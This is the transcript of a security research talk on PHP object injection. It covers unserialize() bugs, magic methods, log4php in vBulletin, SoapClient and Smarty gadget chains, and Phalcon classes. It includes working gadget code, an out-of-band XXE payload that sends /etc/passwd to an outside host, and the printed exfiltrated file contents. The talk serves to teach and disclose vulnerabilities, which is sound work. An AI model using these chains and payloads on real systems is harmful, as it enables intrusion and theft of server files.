Loading presentation...

Present Remotely

Send the link below via email or IM

Copy

Present to your audience

Start remote presentation

  • Invited audience members will follow you as you navigate and present
  • People invited to a presentation do not need a Prezi account
  • This link expires 10 minutes after you close the presentation
  • A maximum of 30 users can follow your presentation
  • Learn more about this feature in our knowledge base article

Do you really want to delete this prezi?

Neither you, nor the coeditors you shared it with will be able to recover it again.

DeleteCancel

Copy of PHP Object Injection Revisited

No description
by

liuke liuke

on 29 March 2018

Comments (0)

Please log in to add your comment.

Report abuse

Transcript of Copy of PHP Object Injection Revisited

$ whoami
Deserialize bugs in 2013, you kiddin?
Actually still alive, just remember Ruby and YAML
(CVE 2013-0156, 0333)
What about PHP?
Invision Power Board <= 3.3.4 "unserialize()" PHP Code Execution (CVE 2012-5692)
But...
No new concepts since "Shocking news in PHP exploitation" by Stefan Esser (2009)
What is actually
PHP Object Injection?
class Foo {
public $bar = "baz";
}
O:3:"Foo":1:{s:3:"bar";s:3:"baz";}
serialize()
Vulnerable PHP Web Application
object(Foo)#2 (1) {
["bar"]=>
string(3) "baz"
}
unserialize()
POST /
PHP magic methods
__construct()
__destruct()
__call()
__callStatic()
__get()
__set()
__isset()
__unset()
__sleep()
__wakeup()
__toString()
__invoke()
__set_state()
__clone()
PHP Object Injection Revisited
me@raz0r.name @ru_raz0r
__destruct
Is called when object is freed, i.e. on script termination
May contain dangerous code, when deserialized
CakePHP <= 1.3.5 / 1.2.8
function __destruct() {
if ($this->__cache) {
$core = App::core('cake');
unset($this->__paths[rtrim($core[0], DS)]);
Cache::write('dir_map', array_filter($this->__paths),'_cake_core_');
Cache::write('file_map', array_filter($this->__map),'_cake_core_');
Cache::write('object_map', $this->__objects, '_cake_core_');
}
}
Why only __destruct and web app's classes?
vBulletin 5
core
libraries
log4php
examples (no 403!)
log4php
http://logging.apache.org/log4php/
used by CMS Made Simple , SugarCRM, vtiger, etc
contains handy "examples" dir
vBulletin just cloned the repo leaving examples and did not protect it
Examples
appender_console.php
appender_dailyfile.php
appender_echo.php
appender_file.php
appender_mailevent.php
appender_mail.php
appender_mongodb.php
appender_null.php
appender_pdo.php
appender_php.php
appender_rollingfile.php
appender_socket.php
appender_socket_server.php
appender_syslog.php
cache.php
configurator_basic.php
configurator_php.php
configurator_xml.php
filter_denyall.php
filter_levelmatch.php
filter_levelrange.php
filter_stringmatch.php
layout_html.php
layout_pattern.php
layout_simple.php
layout_ttcc.php
layout_xml.php
mdc.php
ndc.php
renderer_default.php
renderer_map.php
simple.php

$host = 'localhost';
$port = 4242;
$server = Net_Server::create('sequential', $host, $port);
$handler = new Net_Server_Handler_Log();
$server->setCallbackObject($handler);
$server->start();
class Net_Server_Handler_Log extends Net_Server_Handler {

private $hierarchy;

function onStart() {
$this->hierarchy = Logger::getRootLogger();
}

function onReceiveData($clientId = 0, $data = "") {
$events = $this->getEvents($data);
foreach($events as $event) {
$root = $this->hierarchy->getRootLogger();
if($event->getLoggerName() === 'root') {
$root->callAppenders($event);
} else {
$loggers = $this->hierarchy->getCurrentLoggers();
foreach($loggers as $logger) {
$root->callAppenders($event);
$appenders = $logger->getAllAppenders();
foreach($appenders as $appender) {
$appender->doAppend($event);
}
}
}
}
}
function getEvents($data) {
if (preg_match('/^<log4php:event/', $data)) {
throw new Exception("Please use 'log4php.appender.default.useXml = false' in appender_socket.properties file!");
}
preg_match('/^(O:\d+)/', $data, $parts);
$events = split($parts[1], $data);
array_shift($events);
$size = count($events);
for($i=0; $i<$size; $i++) {
$events[$i] = unserialize($parts[1].$events[$i]);
}
return $events;
}
}
Let's use PHP classes instead!
$classes = get_declared_classes();
foreach($classes as $class) {
$methods = get_class_methods($class);
foreach ($methods as $method) {
if (in_array($method, array(/* magic methods */))) {
print $class . '::' . $method . "\n";
}
}
}
Get all the magic methods!
Exception::__toString
ErrorException::__toString
DateTime::__wakeup
DOMException::__toString
LogicException::__toString
BadFunctionCallException::__toString
BadMethodCallException::__toString
DomainException::__toString
InvalidArgumentException::__toString
LengthException::__toString
OutOfRangeException::__toString
RuntimeException::__toString
OutOfBoundsException::__toString
OverflowException::__toString
RangeException::__toString
UnderflowException::__toString
UnexpectedValueException::__toString
CachingIterator::__toString
RecursiveCachingIterator::__toString
SplFileInfo::__toString
DirectoryIterator::__toString
FilesystemIterator::__toString
RecursiveDirectoryIterator::__toString
GlobIterator::__toString
SplFileObject::__toString
SplTempFileObject::__toString
ReflectionException::__toString
ReflectionFunctionAbstract::__toString
ReflectionFunction::__toString
ReflectionParameter::__toString
ReflectionMethod::__toString
ReflectionClass::__toString
ReflectionObject::__toString
ReflectionProperty::__toString
ReflectionExtension::__toString
PharException::__toString
Phar::__destruct
Phar::__toString
PharData::__destruct
PharData::__toString
PharFileInfo::__destruct
PharFileInfo::__toString
SimpleXMLElement::__toString
SimpleXMLIterator::__toString
SoapClient::__call
SoapFault::__toString
mysqli_sql_exception::__toString
PDOException::__toString
PDO::__wakeup
PDOStatement::__wakeup
__call() is triggered when invoking inaccessible methods in an object context
location
uri
style
use
soap_version
login
password
proxy_host
proxy_port
proxy_login
proxy_password
local_cert
passphrase
authentication
compression
encoding
trace
classmap
exceptions
connection_timeout
typemap
type_name
type_ns
from_xml
cache_wsdl
user_agent
stream_context
features
keep_alive
Options
public SoapClient::SoapClient ( mixed $wsdl [, array $options ] )
WSDL mode
Non-WSDL mode
WSDL - Web Services Description Language
$wsdl = "http://somehost/api.wsdl"
Proper serialization is not implemented when SoapClient is initialized in WSDL mode :(
$wsdl = null
Object survives serialization :)
new SoapClient(null, array('location' => 'http://raz0r.name/api.php',
'uri' => 'http://raz0r.name/'));
$event = new SoapClient(null, array('location' => 'http://raz0r.name/api.php', 'uri' => 'http://raz0r.name/'));
$event->getLoggerName();
SOAP Call to api.php
<?php

header("HTTP/1.0 404 <script>alert(1);</script>");
Fatal error: Uncaught SoapFault exception: [HTTP] <script>alert(1);</script> in appender_socket_server.php:71
SoapClient generates SoapFault exception
Does not filter anything
open_basedir bypass
SoapClient can cache WSDL files locally
ini_set('open_basedir', '/var/www/site/');
ini_set('soap.wsdl_cache_enabled', true);
ini_set('soap.wsdl_cache_dir', '/var/www/');
$c = new SoapClient('http://raz0r.name/test.wsdl', array('cache_wsdl' => WSDL_CACHE_DISK));
-rw------- 1 www-data www-data 530 2013-04-17 13:55 wsdl-raz0r-c7c3f5871a779534f433fa6fa878b92c
open_basedir restriction in effect?
Nope!
XSS
$c = new SoapClient(null, array('uri'=>'http://raz0r.name/', 'location'=>'http://raz0r.name/xxe.xml'));
$c->getLoggerName();
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:////etc/passwd">]>
Fatal error: Uncaught SoapFault exception: [Client] DTD are not supported by SOAP
But if we use Out-of-band technique...
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY % a SYSTEM "http://bugsand.hol.es/3_deep?php://filter/read=convert.base64-encode/resource=/etc/passwd">
%a;
%intern;
%trick;
]>
GET /result?cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaApkYWVtb246eDoxOjE6ZGFlbW9uOi91c3Ivc2JpbjovYmluL3NoCmJpbjp4OjI6MjpiaW46L2JpbjovYmluL3NoCnN5czp4OjM6MzpzeXM6L2RldjovYmluL3NoCnN5bmM6eDo0OjY1NTM0OnN5bmM6L2JpbjovYmluL3N5bmMKZ2FtZXM6eDo1OjYwOmdhbWVzOi91c3IvZ2FtZXM6L2Jpbi9zaAptYW46eDo2OjEyOm1hbjovdmFyL2NhY2hlL21hbjovYmluL3NoCmxwOng6Nzo3OmxwOi92YXIvc3Bvb2wvbHBkOi9iaW4vc2gKbWFpbDp4Ojg6ODptYWlsOi92YXIvbWFpbDovYmluL3NoCm5ld3M6eDo5Ojk6bmV3czovdmFyL3Nwb29sL25ld3M6L2Jpbi9zaAp1dWNwOng6MTA6MTA6dXVjcDovdmFyL3Nwb29sL3V1Y3A6L2Jpbi9zaApwcm94eTp4OjEzOjEzOnByb3h5Oi9iaW46L2Jpbi9zaAp3d3ctZGF0YTp4OjMzOjMzOnd3dy1kYXRhOi92YXIvd3d3Oi9iaW4vc2gKYmFja3VwOng6MzQ6MzQ6YmFja3VwOi92YXIvYmFja3VwczovYmluL3NoCmxpc3Q6eDozODozODpNYWlsaW5nIExpc3QgTWFuYWdlcjovdmFyL2xpc3Q6L2Jpbi9zaAppcmM6eDozOTozOTppcmNkOi92YXIvcnVuL2lyY2Q6L2Jpbi9zaApnbmF0czp4OjQxOjQxOkduYXRzIEJ1Zy1SZXBvcnRpbmcgU3lzdGVtIChhZG1pbik6L3Zhci9saWIvZ25hdHM6L2Jpbi9zaApsaWJ1dWlkOng6MTAwOjEwMTo6L3Zhci9saWIvbGlidXVpZDovYmluL3NoCnN5c2xvZzp4OjEwMToxMDM6Oi9ob21lL3N5c2xvZzovYmluL2ZhbHNlCnNzaGQ6eDoxMDI6NjU1MzQ6Oi92YXIvcnVuL3NzaGQ6L3Vzci9zYmluL25vbG9naW4KbGFuZHNjYXBlOng6MTAzOjEwODo6L3Zhci9saWIvbGFuZHNjYXBlOi9iaW4vZmFsc2UKbWVzc2FnZWJ1czp4OjEwNDoxMTI6Oi92YXIvcnVuL2RidXM6L2Jpbi9mYWxzZQpub2JvZHk6eDo2NTUzNDo2NTUzNDpub2JvZHk6L25vbmV4aXN0ZW50Oi9iaW4vc2gKbXlzcWw6eDoxMDU6MTEzOjovdmFyL2xpYi9teXNxbDovYmluL2ZhbHNlCmF2YWhpOng6MTA2OjExNDo6L3Zhci9ydW4vYXZhaGktZGFlbW9uOi9iaW4vZmFsc2UKc25vcnQ6eDoxMDc6MTE1OlNub3J0IElEUzovdmFyL2xvZy9zbm9ydDovYmluL2ZhbHNlCnN0YXRkOng6MTA4OjY1NTM0OjovdmFyL2xpYi9uZnM6L2Jpbi9mYWxzZQp1c2JtdXg6eDoxMDk6NDY6Oi9ob21lL3VzYm11eDovYmluL2ZhbHNlCnB1bHNlOng6MTEwOjExNjo6L3Zhci9ydW4vcHVsc2U6L2Jpbi9mYWxzZQpydGtpdDp4OjExMToxMTc6Oi9wcm9jOi9iaW4vZmFsc2UKZmVzdGl2YWw6eDoxMTI6Mjk6Oi9ob21lL2Zlc3RpdmFsOi9iaW4vZmFsc2UKcG9zdGdyZXM6eDoxMDAwOjEwMDA6Oi9ob21lL3Bvc3RncmVzOi9iaW4vc2gKcmF6MHI6eDoxMDAxOjEwMDE6LCwsOi9ob21lL3JhejByOi9iaW4vYmFzaApoYWxkYWVtb246eDoxMTM6MTIyOkhhcmR3YXJlIGFic3RyYWN0aW9uIGxheWVyLCwsOi92YXIvcnVuL2hhbGQ6L2Jpbi9mYWxzZQptb25nb2RiOng6MTE0OjY1NTM0OjovaG9tZS9tb25nb2RiOi9iaW4vZmFsc2UK
Host: bugsand.hol.es
Connection: close
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
landscape:x:103:108::/var/lib/landscape:/bin/false
Smarty!
public function __destruct()
{
if ($this->smarty->cache_locking && isset($this->cached) && $this->cached->is_locked) {
$this->cached->handler->releaseLock($this->smarty, $this->cached);
}
}
Smarty_Internal_Template
class Smarty {
public $cache_locking = true;
}

class Smarty_Template_Cached {
public $is_locked = true;

public function __construct() {
$this->handler = new SoapClient(null, array(
'uri' =>'http://raz0r.name/',
'location' =>'http://raz0r.name/xxe.xml')
);
}
}

class Smarty_Internal_Template {
public function __construct() {
$this->smarty = new Smarty();
$this->cached = new Smarty_Template_Cached();
}
}

$c = serialize(new Smarty_Internal_Template());
XXE will be triggered automagically!
Boring stuff
Web application security researcher you have never
heard of
Casual CTF player, random bug bounties
participant, bla bla
PHP hater since 2006
Some new stuff
Some future stuff
Joomla! <= 3.0.2 (highlight.php) PHP Object Injection
vulnerability (CVE-2013-1453)
CubeCart <= 5.2.0 (cubecart.class.php) PHP Object Injection vulnerability (CVE-2013-1465)
all by Egidio Romano
But a method is called on unserialized object
No useful magic methods in log4php
So what?
Arseny Reutov
XXE
Kudos to Alexey Osipov and Timur Yunusov from Positive Technologies
What if a PHP framework is implemented
as a PHP extension?
Phalcon is a web framework implemented as a C extension
offering high performance and lower resource consumption.
The whole Phalcon class userspace is exposed to the users of shared hostings even if they do not use it
So we have unserialize...
__wakeup()
Phalcon\Exception::__toString
Phalcon\DI\Injectable::__get
Phalcon\DI::__call
Phalcon\Forms\Element::__toString
Phalcon\Mvc\View\Engine::__get
Phalcon\Mvc\Model\Exception::__toString
Phalcon\Config::__set_state
Phalcon\DI\FactoryDefault::__call
Phalcon\Cache\Exception::__toString
Phalcon\Tag\Exception::__toString
Phalcon\Paginator\Exception::__toString
Phalcon\Validation::__get
Phalcon\Validation\Message::__toString
Phalcon\Validation\Message::__set_state
Phalcon\Validation\Exception::__toString
Phalcon\Validation\Message\Group::__set_state
Phalcon\Db\Index::__set_state
Phalcon\Db\Column::__set_state
Phalcon\Db\Exception::__toString
Phalcon\Db\Reference::__set_state
Phalcon\Db\RawValue::__toString
Phalcon\Acl\Role::__toString
Phalcon\Acl\Resource::__toString
Phalcon\Acl\Exception::__toString
Phalcon\Security\Exception::__toString
Phalcon\Session\Bag::__set
Phalcon\Session\Bag::__get
Phalcon\Session\Bag::__isset
Phalcon\Session\Bag::__unset
Phalcon\Session\Exception::__toString
Phalcon\DI\Exception::__toString
Phalcon\DI\FactoryDefault\CLI::__call
Phalcon\DI\Service::__set_state
Phalcon\Filter\Exception::__toString
Phalcon\Flash\Exception::__toString
Phalcon\CLI\Task::__get
Phalcon\CLI\Console\Exception::__toString
Phalcon\CLI\Dispatcher\Exception::__toString
Phalcon\CLI\Router\Exception::__toString
Phalcon\Annotations\Exception::__toString
Phalcon\Annotations\Reflection::__set_state
Phalcon\Loader\Exception::__toString
Phalcon\Logger\Exception::__toString
Phalcon\Logger\Adapter\File::__wakeup
Phalcon\Config\Exception::__toString
Phalcon\Config\Adapter\Ini::__set_state
Phalcon\Forms\Form::__get
Phalcon\Forms\Exception::__toString
Phalcon\Forms\Element\File::__toString
Phalcon\Forms\Element\Text::__toString
Phalcon\Forms\Element\Date::__toString
Phalcon\Forms\Element\Hidden::__toString
Phalcon\Forms\Element\Numeric::__toString
Phalcon\Forms\Element\Submit::__toString
Phalcon\Forms\Element\Check::__toString
Phalcon\Forms\Element\Select::__toString
Phalcon\Forms\Element\Password::__toString
Phalcon\Forms\Element\TextArea::__toString
Phalcon\Translate\Exception::__toString
Phalcon\Crypt\Exception::__toString
Phalcon\Escaper\Exception::__toString
Phalcon\Assets\Exception::__toString
Phalcon\Http\Cookie::__toString
Phalcon\Http\Cookie\Exception::__toString
Phalcon\Http\Response\Headers::__set_state
Phalcon\Http\Request\Exception::__toString
Phalcon\Http\Response\Exception::__toString
Phalcon\Mvc\View::__set
Phalcon\Mvc\View::__get
Phalcon\Mvc\Micro::__get
Phalcon\Mvc\Model::__call
Phalcon\Mvc\Model::__callStatic
Phalcon\Mvc\Model::__set
Phalcon\Mvc\Model::__get
Phalcon\Mvc\Model::__isset
Phalcon\Mvc\Application::__get
Phalcon\Mvc\Application\Exception::__toString
Phalcon\Mvc\Controller::__get
Phalcon\Mvc\Collection\Exception::__toString
Phalcon\Mvc\Dispatcher\Exception::__toString
Phalcon\Mvc\Micro\LazyLoader::__call
Phalcon\Mvc\Micro\Exception::__toString
Phalcon\Mvc\Model\Message::__toString
Phalcon\Mvc\Model\Message::__set_state
Phalcon\Mvc\Model\ValidationFailed::__toString
Phalcon\Mvc\Model\Transaction\Failed::__toString
Phalcon\Mvc\Model\Transaction\Exception::__toString
Phalcon\Mvc\Router\Exception::__toString
Phalcon\Mvc\User\Plugin::__get
Phalcon\Mvc\User\Module::__get
Phalcon\Mvc\Url\Exception::__toString
Phalcon\Mvc\User\Component::__get
Phalcon\Mvc\View\Exception::__toString
Phalcon\Mvc\View\Engine\Php::__get
Phalcon\Mvc\View\Engine\Volt::__get
Phalcon\Events\Exception::__toString
__wakeup -> fopen -> __toString()
Phalcon\Exception::__toString
Phalcon\DI\Injectable::__get
Phalcon\DI::__call
Phalcon\Forms\Element::__toString
Phalcon\Mvc\View\Engine::__get
Phalcon\Mvc\Model\Exception::__toString
Phalcon\Config::__set_state
Phalcon\DI\FactoryDefault::__call
Phalcon\Cache\Exception::__toString
Phalcon\Tag\Exception::__toString
Phalcon\Paginator\Exception::__toString
Phalcon\Validation::__get
Phalcon\Validation\Message::__toString
Phalcon\Validation\Message::__set_state
Phalcon\Validation\Exception::__toString
Phalcon\Validation\Message\Group::__set_state
Phalcon\Db\Index::__set_state
Phalcon\Db\Column::__set_state
Phalcon\Db\Exception::__toString
Phalcon\Db\Reference::__set_state
Phalcon\Db\RawValue::__toString
Phalcon\Acl\Role::__toString
Phalcon\Acl\Resource::__toString
Phalcon\Acl\Exception::__toString
Phalcon\Security\Exception::__toString
Phalcon\Session\Bag::__set
Phalcon\Session\Bag::__get
Phalcon\Session\Bag::__isset
Phalcon\Session\Bag::__unset
Phalcon\Session\Exception::__toString
Phalcon\DI\Exception::__toString
Phalcon\DI\FactoryDefault\CLI::__call
Phalcon\DI\Service::__set_state
Phalcon\Filter\Exception::__toString
Phalcon\Flash\Exception::__toString
Phalcon\CLI\Task::__get
Phalcon\CLI\Console\Exception::__toString
Phalcon\CLI\Dispatcher\Exception::__toString
Phalcon\CLI\Router\Exception::__toString
Phalcon\Annotations\Exception::__toString
Phalcon\Annotations\Reflection::__set_state
Phalcon\Loader\Exception::__toString
Phalcon\Logger\Exception::__toString
Phalcon\Logger\Adapter\File::__wakeup
Phalcon\Config\Exception::__toString
Phalcon\Config\Adapter\Ini::__set_state
Phalcon\Forms\Form::__get
Phalcon\Forms\Exception::__toString
Phalcon\Forms\Element\File::__toString
Phalcon\Forms\Element\Text::__toString
Phalcon\Forms\Element\Date::__toString
Phalcon\Forms\Element\Hidden::__toString
Phalcon\Forms\Element\Numeric::__toString
Phalcon\Forms\Element\Submit::__toString
Phalcon\Forms\Element\Check::__toString
Phalcon\Forms\Element\Select::__toString
Phalcon\Forms\Element\Password::__toString
Phalcon\Forms\Element\TextArea::__toString
Phalcon\Translate\Exception::__toString
Phalcon\Crypt\Exception::__toString
Phalcon\Escaper\Exception::__toString
Phalcon\Assets\Exception::__toString
Phalcon\Http\Cookie::__toString
Phalcon\Http\Cookie\Exception::__toString
Phalcon\Http\Response\Headers::__set_state
Phalcon\Http\Request\Exception::__toString
Phalcon\Http\Response\Exception::__toString
Phalcon\Mvc\View::__set
Phalcon\Mvc\View::__get
Phalcon\Mvc\Micro::__get
Phalcon\Mvc\Model::__call
Phalcon\Mvc\Model::__callStatic
Phalcon\Mvc\Model::__set
Phalcon\Mvc\Model::__get
Phalcon\Mvc\Model::__isset
Phalcon\Mvc\Application::__get
Phalcon\Mvc\Application\Exception::__toString
Phalcon\Mvc\Controller::__get
Phalcon\Mvc\Collection\Exception::__toString
Phalcon\Mvc\Dispatcher\Exception::__toString
Phalcon\Mvc\Micro\LazyLoader::__call
Phalcon\Mvc\Micro\Exception::__toString
Phalcon\Mvc\Model\Message::__toString
Phalcon\Mvc\Model\Message::__set_state
Phalcon\Mvc\Model\ValidationFailed::__toString
Phalcon\Mvc\Model\Transaction\Failed::__toString
Phalcon\Mvc\Model\Transaction\Exception::__toString
Phalcon\Mvc\Router\Exception::__toString
Phalcon\Mvc\User\Plugin::__get
Phalcon\Mvc\User\Module::__get
Phalcon\Mvc\Url\Exception::__toString
Phalcon\Mvc\User\Component::__get
Phalcon\Mvc\View\Exception::__toString
Phalcon\Mvc\View\Engine\Php::__get
Phalcon\Mvc\View\Engine\Volt::__get
Phalcon\Events\Exception::__toString
do not unserialize user-supplied data!
So...
Thanks!
Questions?
me@raz0r.name @ru_raz0r
Arseny Reutov
init any class and execute arbitrary methods
Full transcript